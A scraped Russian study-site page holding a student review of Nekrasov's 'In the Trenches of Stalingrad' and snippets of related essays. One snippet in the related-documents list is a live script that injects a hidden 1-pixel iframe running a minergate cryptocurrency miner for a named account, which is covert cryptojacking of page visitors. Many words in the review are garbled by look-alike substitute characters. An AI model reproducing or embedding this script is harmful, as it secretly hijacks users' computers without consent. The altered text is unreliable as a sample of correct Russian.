-



   Рецензия на повесть В. П. Некрасова «В окопах Сталинграда»




doc.png  Тип документа: Сочинения


type.png  Предмет: Некрасов В.П.


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

Рецензия на повесть В. П. Некрасова «В окопах Сталинграда»

Повесть “В окопах Сталинграда” посвящена героической обороне города в 1942—1943 годах.

Это произведение впервые было напечатано в 1946 году в журнале “Знамя”. Но сразу же было запрещено, учитывая, что в нем показывалось автором “действительное лицо” войны со всеми поражениями и неудачами. Но самое главное заключалось в том, что в этом произведении Виктор Некрасов рассказывал, какой ценой русский народ добился долгожданной Победы!

Эта повесть очень легко читается. Она написана обыденно, простым языком. Но это свойственно автору.

Нельзя не сказать и о том, что автор написал это произведение от первого лица, а один из главных героев — лейтенант Керженцев — это сам автор, благородно защищавший Сталинград.

Повесть “В окопах Сталинграда” — это фронᴛᴏʙой дневник автора, в котором от начала до конца он описывает тяжелые бои, трудности, с кᴏᴛᴏᴘыᴍ и сталкивались солдаты во время войны.

Есть еще одна особенность у этого произведения: если внимательно вчитаться, то можно заметить, что оно открыто противостояло законам того времени, когда государством управлял Сталин

. В повести нет генералов, нет политработников, нет “руководящей роли партии”, а есть только солдаты и их командиры, есть сталинградский окоп, мужество, героизм и патриотизм русского народа.

Командир и его солдаты — это главные герои, все без исключения. Все они разные, но объединены одной целью — защитить Родину!

Солдаты, героически оборонявшие Сталинград, не вымышленные люди, а фронᴛᴏʙые ᴛᴏʙарищи самого автора. По этой причине все произведение пронизано любовью к ним.

Создавая образ Керженцева и других героев, Виктор Некрасов пытается рассказать нам, как война изменила судьбы, характеры людей, что такими, какими люди были раньше, до войны, они уже не станут.

Автор с глубочайшим сожалением пишет о гибели родного города, в котором он вырос, который он горячо любил.

Виктор Некрасов стремился донести до читателей, что только благодаря патриотизму русского народа была выиграна эта война!

И пусть немецкие войска были больше подгоᴛᴏʙлены к военным действиям, пусть у них было все необходимое для этого, но Победа осталась за нами! “Мы будем воевать до последнего солдата.

Русские всегда так воюют”, до окончательной победы. Эта мысль цепочкой проходит через всю повесть и является основной идеей этого произведения.

Эта повесть стала бесценным даром, который оставил после себя Виктор Платонович Некрасов. Цель, которую он ставил перед собой — изобразить войну такой, какая она есть, — была выполнена им полностью.

В нашей стᴘẚʜᴇ с давних пор не любили тех, кто говорил людям правду. По этой причине судьба его была определена, и ему ничего не оставалось, как уехать за границу, где он мог писать свои произведения и дарить их людям.



Похожие документы


Киноповесть «Украина в огне»: судьба народа сквозь призму авторского видения и оценки
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//ru.minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/2/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })();...

Гениальная повесть Н. В. Гоголя «Тарас Бульба»
Гениальная повесть Н. В. Гоголя «Тарас Бульба» Гениальная повесть Н. В. Гоголя «Тарас Бульба» 1. Главный герой повести — Тарас Бульба. 2. Трагическая судьба Остапа. 3. Предательство Андрея и позорная его гибель. 4. Гоголевское мастерство в передаче пейзажа, юмора. 5. Бессмертное творение Гоголя. 6. Первая историческая тема Н. В. Гоголя. Исполненная глубокого драматизма борьба украинского народа против польской шляхты привлекла к себе внимание Н. В. Гоголя задолго до начала работы над «Тарасом Бульбой». Эта повесть стала, можно сказать, первой, хотя и серьезной пробой гоголевского пера в исторической прозе. Писатель работал над этой повестью около десяти лет. Она была любимым его детищем. Запорожская Сечь в изображении Гоголя — это царство свободы и равенства, это вольная республика, в которой живут люди абсолютно свободные и равные, где воспитываются сильные, мужественные характеры, для которых нет ничего выше на свете, чем интересы народа, чем свобода и независимость отчизны. Замечателен и оригинален образ главного героя повести — Тараса. Суровый и непреклонный Тарас Бульба ведет жизнь, полную невзгод и опасностей. Это воин, он не был создан для семейного очага. Его «нежба» — чистое поле да добрый конь. Увидевшись после долгой разлуки с сыновьями, Тарас назавтра же спешит с ними в Сечь, к казакам. Человек огромной воли и природного ума, нежный к товарищам и беспощадный к врагу, он карает польских магнатов. Это могучий человек, овеянный поэтической легендой, по выражению Гоголя, «точно необыкновенное явление русской силы». Вместе с тем Тарас не противопоставлен окружающей его среде....

«Кайдашева семья» - социально-бытовая повесть-хроника. Особенности сюжета и композиции
Цель:             ознакомить школьников с повестью «Кайдашева семья»; оказывать содействие выработке навыков определять жанр, композиционный состав произведения; воспитывать высокие морально-этические черты простого человека. Тип урока:     комбинированный. ...

Рецензия на роман В. П. Астафьева печальный детектив
Основной задачей литературы всегда была задача отношения и разработки наиболее актуальных проблем: в XIX веке была проблема поиска идеала борца за свободу, на рубеже XIX-XX веков - проблема революции. В наше время наиболее актуальной является тема нравственности. Отражая проблемы и противоречия нашего времени, мастера слова идут на шаг вперед своих современников, освещая путь к будущему....

Рецензия на прочитанную книгу
Сочинения по литературе: Рецензия на прочитанную книгу Роман Ф. М. Достоевского "Преступление и наказание" — одно из сложнейших произведений не только в творчестве писателя, но и в русской литературе в целом. Сегодня, когда сильна привычка смотреть экранизацию книг "по мотивам", читать "по диагонали", непросто осилить объемный роман, увидеть его глубинный смысл, проследить за сложным, несмотря на острый, детективный сюжет, действием. Но если внимательно вчитаться в произведение, можно понять, что все в нем подчинено раскрытию величайшей гуманистической идеи автора. В "Преступлении и наказании" нашло отражение сложное время — 60-е годы XIX столетия. Передовые люди эпохи считали, что сильная Личность, яркая и незаурядная, может встать над обществом. Достоевский показал брожение умов, поиск своего "я" и, как результат этого, создание теорий, противопоставляющих человека и окружающий его мир. Идеи Раскольникова и Лужина, жизненная позиция Свидригайлова не вымысел автора, а реально существовавшие взгляды. Экономическая теория Лужина почти полностью совпадает с "теорией разумного эгоизма" Добролюбова и Чернышевского. А у Раскольникова есть реальный прототип, человек, совершивший преступление не из-за денег, а под влиянием своей идеи....

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям